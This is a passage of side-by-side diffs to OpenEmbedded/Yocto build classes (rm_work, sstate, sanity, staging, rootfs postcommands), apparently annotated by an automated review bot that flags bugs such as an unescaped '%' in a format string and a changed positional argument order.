75 # of chain tasks depend directly on do_package anymore. 82 # of chain tasks depend directly on do_package anymore.
76 rm -f $i; 83 "${RM_BIN}" -f -- $i;
77 ;; 84 ;;
78 *_setscene*) 85 *_setscene*)
79 # Skip stamps which are already setscene versions 86 # Skip stamps which are already setscene versions
@@ -90,7 +97,7 @@ do_rm_work () {
90 ;; 97 ;;
91 esac 98 esac
92 done 99 done
93 rm -f $i 100 "${RM_BIN}" -f -- $i
94 esac 101 esac
95 done 102 done
96 103
@@ -100,9 +107,9 @@ do_rm_work () {
100 # Retain only logs and other files in temp, safely ignore 107 # Retain only logs and other files in temp, safely ignore
101 # failures of removing pseudo folers on NFS2/3 server. 108 # failures of removing pseudo folers on NFS2/3 server.
102 if [ $dir = 'pseudo' ]; then 109 if [ $dir = 'pseudo' ]; then
103 rm -rf $dir 2> /dev/null || true 110 "${RM_BIN}" -rf -- $dir 2> /dev/null || true
104 elif ! echo "$excludes" | grep -q -w "$dir"; then 111 elif ! echo "$excludes" | grep -q -w "$dir"; then
105 rm -rf $dir 112 "${RM_BIN}" -rf -- $dir
106 fi 113 fi
107 done 114 done
108} 115}
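Review bot: The new shell local is referenced as `"${RM_BIN}"`, and inside a BitBake shell function the brace form is also the syntax BitBake expands from the datastore before the script runs. As long as no RM_BIN variable exists in the metadata the reference is left for the shell, but a variable of that name set in any layer or in local.conf would be substituted into the `-z` check and all four removal calls in place of the path resolved from HOSTTOOLS_DIR. The other shell locals in this function are written `$i`, `$dir` and `$p`; I would use the same form here, e.g. `"$RM_BIN" -rf -- $dir`. do_rm_work continues outside the visible hunks.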
diff --git a/meta/classes/rootfs-postcommands.bbclass b/meta/classes/rootfs-postcommands.bbclass
index c43b9a9823..943534c57a 100644
--- a/meta/classes/rootfs-postcommands.bbclass
+++ b/meta/classes/rootfs-postcommands.bbclass
@@ -1,6 +1,6 @@
1 1
2# Zap the root password if debug-tweaks feature is not enabled 2# Zap the root password if debug-tweaks feature is not enabled
3ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'empty-root-password' ], "", "zap_empty_root_password ; ",d)}' 3ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'empty-root-password' ], "", "zap_empty_root_password; ",d)}'
4 4
5# Allow dropbear/openssh to accept logins from accounts with an empty password string if debug-tweaks or allow-empty-password is enabled 5# Allow dropbear/openssh to accept logins from accounts with an empty password string if debug-tweaks or allow-empty-password is enabled
6ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'allow-empty-password' ], "ssh_allow_empty_password; ", "",d)}' 6ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'allow-empty-password' ], "ssh_allow_empty_password; ", "",d)}'
@@ -12,7 +12,7 @@ ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'deb
12ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'post-install-logging' ], "postinst_enable_logging; ", "",d)}' 12ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'post-install-logging' ], "postinst_enable_logging; ", "",d)}'
13 13
14# Create /etc/timestamp during image construction to give a reasonably sane default time setting 14# Create /etc/timestamp during image construction to give a reasonably sane default time setting
15ROOTFS_POSTPROCESS_COMMAND += "rootfs_update_timestamp ; " 15ROOTFS_POSTPROCESS_COMMAND += "rootfs_update_timestamp; "
16 16
17# Tweak the mount options for rootfs in /etc/fstab if read-only-rootfs is enabled 17# Tweak the mount options for rootfs in /etc/fstab if read-only-rootfs is enabled
18ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains("IMAGE_FEATURES", "read-only-rootfs", "read_only_rootfs_hook; ", "",d)}' 18ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains("IMAGE_FEATURES", "read-only-rootfs", "read_only_rootfs_hook; ", "",d)}'
@@ -26,7 +26,7 @@ ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains("IMAGE_FEATURES", "read-only
26APPEND_append = '${@bb.utils.contains("IMAGE_FEATURES", "read-only-rootfs", " ro", "", d)}' 26APPEND_append = '${@bb.utils.contains("IMAGE_FEATURES", "read-only-rootfs", " ro", "", d)}'
27 27
28# Generates test data file with data store variables expanded in json format 28# Generates test data file with data store variables expanded in json format
29ROOTFS_POSTPROCESS_COMMAND += "write_image_test_data ; " 29ROOTFS_POSTPROCESS_COMMAND += "write_image_test_data; "
30 30
31# Write manifest 31# Write manifest
32IMAGE_MANIFEST = "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.manifest" 32IMAGE_MANIFEST = "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.manifest"
@@ -267,9 +267,10 @@ python write_image_manifest () {
267 267
268 if os.path.exists(manifest_name) and link_name: 268 if os.path.exists(manifest_name) and link_name:
269 manifest_link = deploy_dir + "/" + link_name + ".manifest" 269 manifest_link = deploy_dir + "/" + link_name + ".manifest"
270 if os.path.lexists(manifest_link): 270 if manifest_link != manifest_name:
271 os.remove(manifest_link) 271 if os.path.lexists(manifest_link):
272 os.symlink(os.path.basename(manifest_name), manifest_link) 272 os.remove(manifest_link)
273 os.symlink(os.path.basename(manifest_name), manifest_link)
273} 274}
274 275
275# Can be used to create /etc/timestamp during image construction to give a reasonably 276# Can be used to create /etc/timestamp during image construction to give a reasonably
@@ -304,7 +305,7 @@ rootfs_trim_schemas () {
304} 305}
305 306
306rootfs_check_host_user_contaminated () { 307rootfs_check_host_user_contaminated () {
307 contaminated="${WORKDIR}/host-user-contaminated.txt" 308 contaminated="${S}/host-user-contaminated.txt"
308 HOST_USER_UID="$(PSEUDO_UNLOAD=1 id -u)" 309 HOST_USER_UID="$(PSEUDO_UNLOAD=1 id -u)"
309 HOST_USER_GID="$(PSEUDO_UNLOAD=1 id -g)" 310 HOST_USER_GID="$(PSEUDO_UNLOAD=1 id -g)"
310 311
@@ -339,9 +340,10 @@ python write_image_test_data() {
339 340
340 if os.path.exists(testdata_name) and link_name: 341 if os.path.exists(testdata_name) and link_name:
341 testdata_link = os.path.join(deploy_dir, "%s.testdata.json" % link_name) 342 testdata_link = os.path.join(deploy_dir, "%s.testdata.json" % link_name)
342 if os.path.lexists(testdata_link): 343 if testdata_link != testdata_name:
343 os.remove(testdata_link) 344 if os.path.lexists(testdata_link):
344 os.symlink(os.path.basename(testdata_name), testdata_link) 345 os.remove(testdata_link)
346 os.symlink(os.path.basename(testdata_name), testdata_link)
345} 347}
346write_image_test_data[vardepsexclude] += "TOPDIR" 348write_image_test_data[vardepsexclude] += "TOPDIR"
347 349
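Review bot: The new guard `if manifest_link != manifest_name:` in write_image_manifest, like the matching `testdata_link != testdata_name` in write_image_test_data, compares the two paths as raw strings, so it only catches the self-link case when both are spelled identically. manifest_link is built by concatenation with "/" while manifest_name is computed outside the hunk; if the two differ only by a doubled or trailing slash, the branch still runs `os.remove(manifest_link)` on the real manifest and then creates a symlink that points at itself. Comparing normalised paths, e.g. `if os.path.normpath(manifest_link) != os.path.normpath(manifest_name):`, would close that gap. Both function bodies start outside their hunks, so how the *_name values are built is not visible here.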
diff --git a/meta/classes/rootfsdebugfiles.bbclass b/meta/classes/rootfsdebugfiles.bbclass
index e2ba4e3647..85c7ec7434 100644
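--- a/meta/classes/rootfsdebugfiles.bbclass
+++ b/meta/classes/rootfsdebugfiles.bbclass
@@ -28,7 +28,7 @@
 ROOTFS_DEBUG_FILES ?= ""
 ROOTFS_DEBUG_FILES[doc] = "Lists additional files or directories to be installed with 'cp -a' in the format 'source1 target1;source2 target2;...'"
 
-ROOTFS_POSTPROCESS_COMMAND += "rootfs_debug_files ;"
+ROOTFS_POSTPROCESS_COMMAND += "rootfs_debug_files;"
 rootfs_debug_files () {
  #!/bin/sh -e
  echo "${ROOTFS_DEBUG_FILES}" | sed -e 's/;/\n/g' | while read source target mode; do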
diff --git a/meta/classes/sanity.bbclass b/meta/classes/sanity.bbclass
index 866d066288..33e5e5952f 100644
--- a/meta/classes/sanity.bbclass
+++ b/meta/classes/sanity.bbclass
@@ -392,9 +392,12 @@ def check_connectivity(d):
392 msg = data.getVar('CONNECTIVITY_CHECK_MSG') or "" 392 msg = data.getVar('CONNECTIVITY_CHECK_MSG') or ""
393 if len(msg) == 0: 393 if len(msg) == 0:
394 msg = "%s.\n" % err 394 msg = "%s.\n" % err
395 msg += " Please ensure your host's network is configured correctly,\n" 395 msg += " Please ensure your host's network is configured correctly.\n"
396 msg += " or set BB_NO_NETWORK = \"1\" to disable network access if\n" 396 msg += " If your ISP or network is blocking the above URL,\n"
397 msg += " all required sources are on local disk.\n" 397 msg += " try with another domain name, for example by setting:\n"
398 msg += " CONNECTIVITY_CHECK_URIS = \"https://www.example.com/\""
399 msg += " You could also set BB_NO_NETWORK = \"1\" to disable network\n"
400 msg += " access if all required sources are on local disk.\n"
398 retval = msg 401 retval = msg
399 402
400 return retval 403 return retval
@@ -558,6 +561,14 @@ def check_tar_version(sanity_data):
558 version = result.split()[3] 561 version = result.split()[3]
559 if LooseVersion(version) < LooseVersion("1.28"): 562 if LooseVersion(version) < LooseVersion("1.28"):
560 return "Your version of tar is older than 1.28 and does not have the support needed to enable reproducible builds. Please install a newer version of tar (you could use the project's buildtools-tarball from our last release or use scripts/install-buildtools).\n" 563 return "Your version of tar is older than 1.28 and does not have the support needed to enable reproducible builds. Please install a newer version of tar (you could use the project's buildtools-tarball from our last release or use scripts/install-buildtools).\n"
564
565 try:
566 result = subprocess.check_output(["tar", "--help"], stderr=subprocess.STDOUT).decode('utf-8')
567 if "--xattrs" not in result:
568 return "Your tar doesn't support --xattrs, please use GNU tar.\n"
569 except subprocess.CalledProcessError as e:
570 return "Unable to execute tar --help, exit code %d\n%s\n" % (e.returncode, e.output)
571
561 return None 572 return None
562 573
563# We use git parameters and functionality only found in 1.7.8 or later 574# We use git parameters and functionality only found in 1.7.8 or later
@@ -882,13 +893,18 @@ def check_sanity_everybuild(status, d):
882 except: 893 except:
883 pass 894 pass
884 895
885 oeroot = d.getVar('COREBASE') 896 for checkdir in ['COREBASE', 'TMPDIR']:
886 if oeroot.find('+') != -1: 897 val = d.getVar(checkdir)
887 status.addresult("Error, you have an invalid character (+) in your COREBASE directory path. Please move the installation to a directory which doesn't include any + characters.") 898 if val.find('..') != -1:
888 if oeroot.find('@') != -1: 899 status.addresult("Error, you have '..' in your %s directory path. Please ensure the variable contains an absolute path as this can break some recipe builds in obtuse ways." % checkdir)
889 status.addresult("Error, you have an invalid character (@) in your COREBASE directory path. Please move the installation to a directory which doesn't include any @ characters.") 900 if val.find('+') != -1:
890 if oeroot.find(' ') != -1: 901 status.addresult("Error, you have an invalid character (+) in your %s directory path. Please move the installation to a directory which doesn't include any + characters." % checkdir)
891 status.addresult("Error, you have a space in your COREBASE directory path. Please move the installation to a directory which doesn't include a space since autotools doesn't support this.") 902 if val.find('@') != -1:
903 status.addresult("Error, you have an invalid character (@) in your %s directory path. Please move the installation to a directory which doesn't include any @ characters." % checkdir)
904 if val.find(' ') != -1:
905 status.addresult("Error, you have a space in your %s directory path. Please move the installation to a directory which doesn't include a space since autotools doesn't support this." % checkdir)
906 if val.find('%') != -1:
907 status.addresult("Error, you have an invalid character (%) in your %s directory path which causes problems with python string formatting. Please move the installation to a directory which doesn't include any % characters." % checkdir)
892 908
893 # Check the format of MIRRORS, PREMIRRORS and SSTATE_MIRRORS 909 # Check the format of MIRRORS, PREMIRRORS and SSTATE_MIRRORS
894 import re 910 import re
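Review bot: The added `%` check in check_sanity_everybuild builds its message with `% checkdir`, but the message text itself contains a literal `(%)` and a bare `% characters`, so the formatting raises ValueError as soon as a path containing `%` is found and the intended error is never reported. The literal percent signs need doubling: `(%%) in your %s directory path` and `doesn't include any %% characters.`. Separately, in check_connectivity the added line `msg += " CONNECTIVITY_CHECK_URIS = \"https://www.example.com/\""` has no trailing `\n`, so the next sentence is glued onto the example URL. Both functions start outside their hunks.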
diff --git a/meta/classes/sstate.bbclass b/meta/classes/sstate.bbclass
index a8e169a10b..1058778980 100644
--- a/meta/classes/sstate.bbclass
+++ b/meta/classes/sstate.bbclass
@@ -20,7 +20,7 @@ def generate_sstatefn(spec, hash, taskname, siginfo, d):
20 components = spec.split(":") 20 components = spec.split(":")
21 # Fields 0,5,6 are mandatory, 1 is most useful, 2,3,4 are just for information 21 # Fields 0,5,6 are mandatory, 1 is most useful, 2,3,4 are just for information
22 # 7 is for the separators 22 # 7 is for the separators
23 avail = (254 - len(hash + "_" + taskname + extension) - len(components[0]) - len(components[1]) - len(components[5]) - len(components[6]) - 7) // 3 23 avail = (limit - len(hash + "_" + taskname + extension) - len(components[0]) - len(components[1]) - len(components[5]) - len(components[6]) - 7) // 3
24 components[2] = components[2][:avail] 24 components[2] = components[2][:avail]
25 components[3] = components[3][:avail] 25 components[3] = components[3][:avail]
26 components[4] = components[4][:avail] 26 components[4] = components[4][:avail]
@@ -123,8 +123,6 @@ SSTATE_HASHEQUIV_REPORT_TASKDATA[doc] = "Report additional useful data to the \
123python () { 123python () {
124 if bb.data.inherits_class('native', d): 124 if bb.data.inherits_class('native', d):
125 d.setVar('SSTATE_PKGARCH', d.getVar('BUILD_ARCH', False)) 125 d.setVar('SSTATE_PKGARCH', d.getVar('BUILD_ARCH', False))
126 if d.getVar("PN") == "pseudo-native":
127 d.appendVar('SSTATE_PKGARCH', '_${ORIGNATIVELSBSTRING}')
128 elif bb.data.inherits_class('crosssdk', d): 126 elif bb.data.inherits_class('crosssdk', d):
129 d.setVar('SSTATE_PKGARCH', d.expand("${BUILD_ARCH}_${SDK_ARCH}_${SDK_OS}")) 127 d.setVar('SSTATE_PKGARCH', d.expand("${BUILD_ARCH}_${SDK_ARCH}_${SDK_OS}"))
130 elif bb.data.inherits_class('cross', d): 128 elif bb.data.inherits_class('cross', d):
@@ -319,6 +317,8 @@ def sstate_install(ss, d):
319 if os.path.exists(i): 317 if os.path.exists(i):
320 with open(i, "r") as f: 318 with open(i, "r") as f:
321 manifests = f.readlines() 319 manifests = f.readlines()
320 # We append new entries, we don't remove older entries which may have the same
321 # manifest name but different versions from stamp/workdir. See below.
322 if filedata not in manifests: 322 if filedata not in manifests:
323 with open(i, "a+") as f: 323 with open(i, "a+") as f:
324 f.write(filedata) 324 f.write(filedata)
@@ -481,7 +481,7 @@ def sstate_clean_cachefiles(d):
481 ss = sstate_state_fromvars(ld, task) 481 ss = sstate_state_fromvars(ld, task)
482 sstate_clean_cachefile(ss, ld) 482 sstate_clean_cachefile(ss, ld)
483 483
484def sstate_clean_manifest(manifest, d, prefix=None): 484def sstate_clean_manifest(manifest, d, canrace=False, prefix=None):
485 import oe.path 485 import oe.path
486 486
487 mfile = open(manifest) 487 mfile = open(manifest)
@@ -499,7 +499,9 @@ def sstate_clean_manifest(manifest, d, prefix=None):
499 if entry.endswith("/"): 499 if entry.endswith("/"):
500 if os.path.islink(entry[:-1]): 500 if os.path.islink(entry[:-1]):
501 os.remove(entry[:-1]) 501 os.remove(entry[:-1])
502 elif os.path.exists(entry) and len(os.listdir(entry)) == 0: 502 elif os.path.exists(entry) and len(os.listdir(entry)) == 0 and not canrace:
503 # Removing directories whilst builds are in progress exposes a race. Only
504 # do it in contexts where it is safe to do so.
503 os.rmdir(entry[:-1]) 505 os.rmdir(entry[:-1])
504 else: 506 else:
505 os.remove(entry) 507 os.remove(entry)
@@ -537,7 +539,7 @@ def sstate_clean(ss, d):
537 for lock in ss['lockfiles']: 539 for lock in ss['lockfiles']:
538 locks.append(bb.utils.lockfile(lock)) 540 locks.append(bb.utils.lockfile(lock))
539 541
540 sstate_clean_manifest(manifest, d) 542 sstate_clean_manifest(manifest, d, canrace=True)
541 543
542 for lock in locks: 544 for lock in locks:
543 bb.utils.unlockfile(lock) 545 bb.utils.unlockfile(lock)
@@ -638,10 +640,21 @@ python sstate_hardcode_path () {
638 640
639def sstate_package(ss, d): 641def sstate_package(ss, d):
640 import oe.path 642 import oe.path
643 import time
641 644
642 tmpdir = d.getVar('TMPDIR') 645 tmpdir = d.getVar('TMPDIR')
643 646
647 fixtime = False
648 if ss['task'] == "package":
649 fixtime = True
650
651 def fixtimestamp(root, path):
652 f = os.path.join(root, path)
653 if os.lstat(f).st_mtime > sde:
654 os.utime(f, (sde, sde), follow_symlinks=False)
655
644 sstatebuild = d.expand("${WORKDIR}/sstate-build-%s/" % ss['task']) 656 sstatebuild = d.expand("${WORKDIR}/sstate-build-%s/" % ss['task'])
657 sde = int(d.getVar("SOURCE_DATE_EPOCH") or time.time())
645 d.setVar("SSTATE_CURRTASK", ss['task']) 658 d.setVar("SSTATE_CURRTASK", ss['task'])
646 bb.utils.remove(sstatebuild, recurse=True) 659 bb.utils.remove(sstatebuild, recurse=True)
647 bb.utils.mkdirhier(sstatebuild) 660 bb.utils.mkdirhier(sstatebuild)
@@ -654,6 +667,8 @@ def sstate_package(ss, d):
654 # to sstate tasks but there aren't many of these so better just avoid them entirely. 667 # to sstate tasks but there aren't many of these so better just avoid them entirely.
655 for walkroot, dirs, files in os.walk(state[1]): 668 for walkroot, dirs, files in os.walk(state[1]):
656 for file in files + dirs: 669 for file in files + dirs:
670 if fixtime:
671 fixtimestamp(walkroot, file)
657 srcpath = os.path.join(walkroot, file) 672 srcpath = os.path.join(walkroot, file)
658 if not os.path.islink(srcpath): 673 if not os.path.islink(srcpath):
659 continue 674 continue
@@ -675,6 +690,11 @@ def sstate_package(ss, d):
675 bb.utils.mkdirhier(plain) 690 bb.utils.mkdirhier(plain)
676 bb.utils.mkdirhier(pdir) 691 bb.utils.mkdirhier(pdir)
677 os.rename(plain, pdir) 692 os.rename(plain, pdir)
693 if fixtime:
694 fixtimestamp(pdir, "")
695 for walkroot, dirs, files in os.walk(pdir):
696 for file in files + dirs:
697 fixtimestamp(walkroot, file)
678 698
679 d.setVar('SSTATE_BUILDDIR', sstatebuild) 699 d.setVar('SSTATE_BUILDDIR', sstatebuild)
680 d.setVar('SSTATE_INSTDIR', sstatebuild) 700 d.setVar('SSTATE_INSTDIR', sstatebuild)
@@ -701,9 +721,16 @@ def sstate_package(ss, d):
701 os.utime(siginfo, None) 721 os.utime(siginfo, None)
702 except PermissionError: 722 except PermissionError:
703 pass 723 pass
724 except OSError as e:
725 # Handle read-only file systems gracefully
726 import errno
727 if e.errno != errno.EROFS:
728 raise e
704 729
705 return 730 return
706 731
732sstate_package[vardepsexclude] += "SSTATE_SIG_KEY"
733
707def pstaging_fetch(sstatefetch, d): 734def pstaging_fetch(sstatefetch, d):
708 import bb.fetch2 735 import bb.fetch2
709 736
@@ -787,7 +814,7 @@ sstate_task_postfunc[dirs] = "${WORKDIR}"
787sstate_create_package () { 814sstate_create_package () {
788 # Exit early if it already exists 815 # Exit early if it already exists
789 if [ -e ${SSTATE_PKG} ]; then 816 if [ -e ${SSTATE_PKG} ]; then
790 [ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG} 817 touch ${SSTATE_PKG} 2>/dev/null || true
791 return 818 return
792 fi 819 fi
793 820
@@ -814,14 +841,18 @@ sstate_create_package () {
814 fi 841 fi
815 chmod 0664 $TFILE 842 chmod 0664 $TFILE
816 # Skip if it was already created by some other process 843 # Skip if it was already created by some other process
817 if [ ! -e ${SSTATE_PKG} ]; then 844 if [ -h ${SSTATE_PKG} ] && [ ! -e ${SSTATE_PKG} ]; then
845 # There is a symbolic link, but it links to nothing.
846 # Forcefully replace it with the new file.
847 ln -f $TFILE ${SSTATE_PKG} || true
848 elif [ ! -e ${SSTATE_PKG} ]; then
818 # Move into place using ln to attempt an atomic op. 849 # Move into place using ln to attempt an atomic op.
819 # Abort if it already exists 850 # Abort if it already exists
820 ln $TFILE ${SSTATE_PKG} && rm $TFILE 851 ln $TFILE ${SSTATE_PKG} || true
821 else 852 else
822 rm $TFILE 853 touch ${SSTATE_PKG} 2>/dev/null || true
823 fi 854 fi
824 [ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG} 855 rm $TFILE
825} 856}
826 857
827python sstate_sign_package () { 858python sstate_sign_package () {
@@ -850,12 +881,12 @@ python sstate_report_unihash() {
850# 881#
851sstate_unpack_package () { 882sstate_unpack_package () {
852 tar -xvzf ${SSTATE_PKG} 883 tar -xvzf ${SSTATE_PKG}
853 # update .siginfo atime on local/NFS mirror 884 # update .siginfo atime on local/NFS mirror if it is a symbolic link
854 [ -O ${SSTATE_PKG}.siginfo ] && [ -w ${SSTATE_PKG}.siginfo ] && [ -h ${SSTATE_PKG}.siginfo ] && touch -a ${SSTATE_PKG}.siginfo 885 [ ! -h ${SSTATE_PKG}.siginfo ] || [ ! -e ${SSTATE_PKG}.siginfo ] || touch -a ${SSTATE_PKG}.siginfo 2>/dev/null || true
855 # Use "! -w ||" to return true for read only files 886 # update each symbolic link instead of any referenced file
856 [ ! -w ${SSTATE_PKG} ] || touch --no-dereference ${SSTATE_PKG} 887 touch --no-dereference ${SSTATE_PKG} 2>/dev/null || true
857 [ ! -w ${SSTATE_PKG}.sig ] || [ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig 888 [ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig 2>/dev/null || true
858 [ ! -w ${SSTATE_PKG}.siginfo ] || [ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo 889 [ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo 2>/dev/null || true
859} 890}
860 891
861BB_HASHCHECK_FUNCTION = "sstate_checkhashes" 892BB_HASHCHECK_FUNCTION = "sstate_checkhashes"
@@ -930,7 +961,7 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
930 961
931 localdata2 = bb.data.createCopy(localdata) 962 localdata2 = bb.data.createCopy(localdata)
932 srcuri = "file://" + sstatefile 963 srcuri = "file://" + sstatefile
933 localdata.setVar('SRC_URI', srcuri) 964 localdata2.setVar('SRC_URI', srcuri)
934 bb.debug(2, "SState: Attempting to fetch %s" % srcuri) 965 bb.debug(2, "SState: Attempting to fetch %s" % srcuri)
935 966
936 try: 967 try:
@@ -941,10 +972,11 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
941 found.add(tid) 972 found.add(tid)
942 if tid in missed: 973 if tid in missed:
943 missed.remove(tid) 974 missed.remove(tid)
944 except: 975 except bb.fetch2.FetchError as e:
945 missed.add(tid) 976 missed.add(tid)
946 bb.debug(2, "SState: Unsuccessful fetch test for %s" % srcuri) 977 bb.debug(2, "SState: Unsuccessful fetch test for %s (%s)" % (srcuri, e))
947 pass 978 except Exception as e:
979 bb.error("SState: cannot test %s: %s" % (srcuri, e))
948 if len(tasklist) >= min_tasks: 980 if len(tasklist) >= min_tasks:
949 bb.event.fire(bb.event.ProcessProgress(msg, len(tasklist) - thread_worker.tasks.qsize()), d) 981 bb.event.fire(bb.event.ProcessProgress(msg, len(tasklist) - thread_worker.tasks.qsize()), d)
950 982
@@ -1006,6 +1038,7 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
1006 bb.parse.siggen.checkhashes(sq_data, missed, found, d) 1038 bb.parse.siggen.checkhashes(sq_data, missed, found, d)
1007 1039
1008 return found 1040 return found
1041setscene_depvalid[vardepsexclude] = "SSTATE_EXCLUDEDEPS_SYSROOT"
1009 1042
1010BB_SETSCENE_DEPVALID = "setscene_depvalid" 1043BB_SETSCENE_DEPVALID = "setscene_depvalid"
1011 1044
@@ -1031,6 +1064,10 @@ def setscene_depvalid(task, taskdependees, notneeded, d, log=None):
1031 if taskdependees[task][1] == "do_populate_lic": 1064 if taskdependees[task][1] == "do_populate_lic":
1032 return True 1065 return True
1033 1066
1067 # We only need to trigger deploy_source_date_epoch through direct dependencies
1068 if taskdependees[task][1] == "do_deploy_source_date_epoch":
1069 return True
1070
1034 # stash_locale and gcc_stash_builddir are never needed as a dependency for built objects 1071 # stash_locale and gcc_stash_builddir are never needed as a dependency for built objects
1035 if taskdependees[task][1] == "do_stash_locale" or taskdependees[task][1] == "do_gcc_stash_builddir": 1072 if taskdependees[task][1] == "do_stash_locale" or taskdependees[task][1] == "do_gcc_stash_builddir":
1036 return True 1073 return True
@@ -1137,6 +1174,11 @@ python sstate_eventhandler() {
1137 os.utime(siginfo, None) 1174 os.utime(siginfo, None)
1138 except PermissionError: 1175 except PermissionError:
1139 pass 1176 pass
1177 except OSError as e:
1178 # Handle read-only file systems gracefully
1179 import errno
1180 if e.errno != errno.EROFS:
1181 raise e
1140 1182
1141} 1183}
1142 1184
@@ -1175,11 +1217,21 @@ python sstate_eventhandler2() {
1175 i = d.expand("${SSTATE_MANIFESTS}/index-" + a) 1217 i = d.expand("${SSTATE_MANIFESTS}/index-" + a)
1176 if not os.path.exists(i): 1218 if not os.path.exists(i):
1177 continue 1219 continue
1220 manseen = set()
1221 ignore = []
1178 with open(i, "r") as f: 1222 with open(i, "r") as f:
1179 lines = f.readlines() 1223 lines = f.readlines()
1180 for l in lines: 1224 for l in reversed(lines):
1181 try: 1225 try:
1182 (stamp, manifest, workdir) = l.split() 1226 (stamp, manifest, workdir) = l.split()
1227 # The index may have multiple entries for the same manifest as the code above only appends
1228 # new entries and there may be an entry with matching manifest but differing version in stamp/workdir.
1229 # The last entry in the list is the valid one, any earlier entries with matching manifests
1230 # should be ignored.
1231 if manifest in manseen:
1232 ignore.append(l)
1233 continue
1234 manseen.add(manifest)
1183 if stamp not in stamps and stamp not in preservestamps and stamp in machineindex: 1235 if stamp not in stamps and stamp not in preservestamps and stamp in machineindex:
1184 toremove.append(l) 1236 toremove.append(l)
1185 if stamp not in seen: 1237 if stamp not in seen:
@@ -1210,6 +1262,8 @@ python sstate_eventhandler2() {
1210 1262
1211 with open(i, "w") as f: 1263 with open(i, "w") as f:
1212 for l in lines: 1264 for l in lines:
1265 if l in ignore:
1266 continue
1213 f.write(l) 1267 f.write(l)
1214 machineindex |= set(stamps) 1268 machineindex |= set(stamps)
1215 with open(mi, "w") as f: 1269 with open(mi, "w") as f:
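Review bot: Inserting `canrace=False` ahead of `prefix=None` in sstate_clean_manifest changes the meaning of the third positional argument: a caller still written as `sstate_clean_manifest(path, d, workdir)` now passes workdir as canrace and leaves prefix unset, with no error raised. The callers in staging.bbclass are converted to keywords in this commit, but classes in other layers cannot be checked from here, and a lost prefix would presumably change which paths the function removes (the part of the body that uses prefix is outside the hunk). Keeping the old order, `def sstate_clean_manifest(manifest, d, prefix=None, canrace=False):`, preserves positional callers and works unchanged with the keyword calls. In sstate_checkhashes, the new `except Exception` branch logs the error but no longer adds tid to `missed` as the old bare `except` did; if that is intended it deserves a comment saying so.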
diff --git a/meta/classes/staging.bbclass b/meta/classes/staging.bbclass
index 506ce0665e..21523c8f75 100644
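--- a/meta/classes/staging.bbclass
+++ b/meta/classes/staging.bbclass
@@ -267,6 +267,10 @@ python extend_recipe_sysroot() {
  pn = d.getVar("PN")
  stagingdir = d.getVar("STAGING_DIR")
  sharedmanifests = d.getVar("COMPONENTS_DIR") + "/manifests"
+ # only needed by multilib cross-canadian since it redefines RECIPE_SYSROOT
+ manifestprefix = d.getVar("RECIPE_SYSROOT_MANIFEST_SUBDIR")
+ if manifestprefix:
+ sharedmanifests = sharedmanifests + "/" + manifestprefix
  recipesysroot = d.getVar("RECIPE_SYSROOT")
  recipesysrootnative = d.getVar("RECIPE_SYSROOT_NATIVE")
 
@@ -408,7 +412,7 @@ python extend_recipe_sysroot() {
  if os.path.islink(f) and not os.path.exists(f):
  bb.note("%s no longer exists, removing from sysroot" % f)
  lnk = os.readlink(f.replace(".complete", ""))
- sstate_clean_manifest(depdir + "/" + lnk, d, workdir)
+ sstate_clean_manifest(depdir + "/" + lnk, d, canrace=True, prefix=workdir)
  os.unlink(f)
  os.unlink(f.replace(".complete", ""))
 
@@ -453,7 +457,7 @@ python extend_recipe_sysroot() {
  fl = depdir + "/" + l
  bb.note("Task %s no longer depends on %s, removing from sysroot" % (mytaskname, l))
  lnk = os.readlink(fl)
- sstate_clean_manifest(depdir + "/" + lnk, d, workdir)
+ sstate_clean_manifest(depdir + "/" + lnk, d, canrace=True, prefix=workdir)
  os.unlink(fl)
  os.unlink(fl + ".complete")
 
@@ -474,7 +478,7 @@ python extend_recipe_sysroot() {
  continue
  else:
  bb.note("%s exists in sysroot, but is stale (%s vs. %s), removing." % (c, lnk, c + "." + taskhash))
- sstate_clean_manifest(depdir + "/" + lnk, d, workdir)
+ sstate_clean_manifest(depdir + "/" + lnk, d, canrace=True, prefix=workdir)
  os.unlink(depdir + "/" + c)
  if os.path.lexists(depdir + "/" + c + ".complete"):
  os.unlink(depdir + "/" + c + ".complete")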
diff --git a/meta/classes/testimage.bbclass b/meta/classes/testimage.bbclass
index c709384b91..7c8b2b30a1 100644
--- a/meta/classes/testimage.bbclass
+++ b/meta/classes/testimage.bbclass
@@ -99,30 +99,9 @@ TESTIMAGE_DUMP_DIR ?= "${LOG_DIR}/runtime-hostdump/"
99TESTIMAGE_UPDATE_VARS ?= "DL_DIR WORKDIR DEPLOY_DIR" 99TESTIMAGE_UPDATE_VARS ?= "DL_DIR WORKDIR DEPLOY_DIR"
100 100
101testimage_dump_target () { 101testimage_dump_target () {
102 top -bn1
103 ps
104 free
105 df
106 # The next command will export the default gateway IP
